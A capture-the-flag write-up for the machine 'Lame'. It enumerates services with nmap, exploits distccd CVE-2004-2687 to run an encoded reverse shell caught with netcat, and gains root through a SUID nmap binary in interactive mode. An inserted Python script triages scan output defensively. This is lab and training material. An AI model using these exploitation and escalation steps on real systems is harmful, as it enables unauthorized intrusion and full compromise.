Nmap scan

As usual let's start with nmap:

└─$ sudo nmap <MACHINE_IP> -p- --min-rate 1000 -v
Starting Nmap 7.91 ( ) at 2021-09-07 17:49 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.050s latency).
Not shown: 65530 filtered ports
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 104.17 seconds
           Raw packets sent: 131147 (5.770MB) | Rcvd: 84 (3.680KB)
└─$ sudo nmap <MACHINE_IP> -p21,22,139,445,3632 -sC -sV
Starting Nmap 7.91 ( ) at 2021-09-07 17:53 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.050s latency).

21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m31s, deviation: 2h49m43s, median: 30s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name:
|   FQDN:
|_  System time: 2021-09-07T17:54:09-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 53.46 seconds

So we have SSH, FTP, Samba and distccd. That last service accepts source code to be compiled on another machine, so I think we can start with it.
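As an added example (not part of the original writeup), here is a small Python triage script that parses the kind of nmap -sC -sV normal output shown above and flags the weak configurations it reveals: the distccd daemon facing the network, anonymous FTP, the clear-text FTP control channel and disabled SMB signing. The sample input is constructed from the scan above; the finding texts and the remediation wording are my own.

```python
import re

# Constructed sample: the relevant lines of the -sC -sV scan above.
SAMPLE_SCAN = """\
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
|      Control connection is plain text
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Services that should never face an untrusted network, with the remediation.
EXPOSED_SERVICES = {
    "distccd": "distccd reachable: restrict to build hosts (--allow) or firewall it",
}

# (prefix of an NSE script line, finding); the port comes from context.
SCRIPT_CHECKS = [
    ("ftp-anon: Anonymous FTP login allowed", "anonymous FTP login allowed"),
    ("Control connection is plain text", "FTP credentials cross the wire in clear text"),
    ("message_signing: disabled", "SMB message signing disabled"),
]


def triage(scan_text):
    """Return (port, finding) pairs; port 0 means a host-level script result."""
    findings = []
    port = 0
    for line in scan_text.splitlines():
        m = PORT_RE.match(line)
        if m:  # a port line sets the context for the NSE lines that follow it
            port = int(m.group(1))
            if m.group(3) == "open" and m.group(4) in EXPOSED_SERVICES:
                findings.append((port, EXPOSED_SERVICES[m.group(4)]))
        elif line.startswith("Host script results"):
            port = 0
        elif line.startswith("|"):  # NSE output: strip the "|", "|_" and indent
            body = line.lstrip("|_ ")
            for prefix, finding in SCRIPT_CHECKS:
                if body.startswith(prefix):
                    findings.append((port, finding))
    return findings
```

Feed it the saved output of a scan (nmap -oN) and each finding comes back with the port it belongs to, which is what an assessment report or a configuration-drift check needs.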


Let's check if it is vulnerable to CVE-2004-2687:

└─$ sudo nmap -p 3632 <MACHINE_IP> --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='id'"
Starting Nmap 7.91 ( ) at 2021-09-07 18:00 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.052s latency).

3632/tcp open  distccd
| distcc-cve2004-2687: 
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|     Disclosure date: 2002-02-01
|     Extra information:
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|     References:

Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds

It is! We have RCE; that was fast. The next step is to get a shell.

Reverse shell

I base64-encoded a Python reverse-shell payload and used a Python implementation of the exploit to send it:

./ -t <MACHINE_IP> -p 3632 -c "echo <BASE64_REVSHELL> | base64 -d | bash"
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [] from (UNKNOWN) [<MACHINE_IP>] 44031
sh: no job control in this shell

The user flag is under /home/makis/user.txt

Privilege escalation

Once on the box we can start checking for escalation vectors. After some digging I found that the nmap binary has the SUID bit set and is owned by root:

daemon@lame:/$ find / -perm /4000 2> /dev/null
daemon@lame:/$ ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap

To abuse this, we can run nmap --interactive and execute a system command from its prompt. That command runs with nmap's effective root privileges, so we can become root:

daemon@lame:/tmp$ nmap --interactive

Starting Nmap V. 4.53 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !bash -p
bash-3.2# id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

The root flag is under /root/root.txt.